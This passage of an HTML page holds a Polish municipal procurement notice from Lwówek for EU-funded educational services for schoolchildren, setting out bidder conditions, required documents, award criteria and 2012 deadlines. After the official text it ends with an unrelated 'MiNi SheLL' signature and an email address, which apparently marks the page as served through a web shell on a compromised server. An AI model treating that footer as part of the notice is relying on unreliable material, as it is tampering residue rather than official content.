- Pomoc dydaktyczna - Mikroskop szkolno-badawczy - lub równoważna; powiększenie: do 400x, okular: 10x, obiektywy: 4x, 10x, 40x na tarczy rewolwerowej, oświetlenie: światło halogenowe (płynna regulacja natężenia), inne: przysłona irysowa, śruba mikro- i mikrometryczna, zasilacz 12V - 1 sztuka,
- Pomoc dydaktyczna - Programy edukacyjne - zaproponowane przez wykonawcę - 1 komplet..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawijący w tym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków, o których mowa:
1) wykonawca udokumentuje, że brał czynny udział w realizacji lub współrealizacji projektów finansowanych lub współfinansowanych przez Unię Europejską w okresie poprzedzającym upływ terminu składania ofert, w których przedmiotem realizacji były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. podpadające pod kody CPV 80100000-5 - 80660000-8 - usługi edukacyjne lub szkoleniowe, a wartość jednego z tych projektów wynosiła co najmniej 100 tyś zł brutto. Kryterium oceny stanowi łączna ilość (liczba) projektów, która zostanie poddana ocenie* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1b,

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania  (odrzuceniem jego oferty).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca udokumentuje, że posiada doświadczenie w realizacji usług/i, gdzie przedmiotem wykonania były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia tj. świadczenie usługi edukacyjnej której odbiorcami były dzieci. Należy wykazać minimum jedną taką usługę na kwotę 100 tys. zł. (kwoty usług nie podlegają sumowaniu). Wartość poszczególnych usług nie stanowi kryterium oceny; oceniany jest łączny czas trwania tych usług* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1b,

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania  (odrzuceniem jego oferty).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia specjalnego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że posiadają one wykształcenie kierunkowe właściwe dla świadczonej usługi* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c,
- Oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że odbyli Oni przeszkolenie z zasad postępowania z dziećmi ze szkół podstawowych  w zakresie prowadzenia zajęć edukacyjnych z zakresu przedmiotu zamówienia, uprawdopodobniające że Wykonawca daje rękojmię należytego wykonania zamówienia, (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c,
- Oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy - jeśli osoby te dysponują potwierdzeniem odbycia tego typu przeszkolenia, potwierdzające, że odbyli Oni przeszkolenie w zakresie równości szans - zasada równości szans kobiet i mężczyzn (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c.

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania  (odrzuceniem jego oferty).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia specjalnego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie - 30</li>
<li>3 - kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lwowek.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bezpłatnie w Urzędzie Miasta i Gminy w Lwówku, ul. Ratuszowa 2, 64-310 Lwówek, pok. nr 20, w godzinach urzędowania..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy Lwówek, ul. Ratuszowa 2, 64-310 Lwówek, pokój Nr 5 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com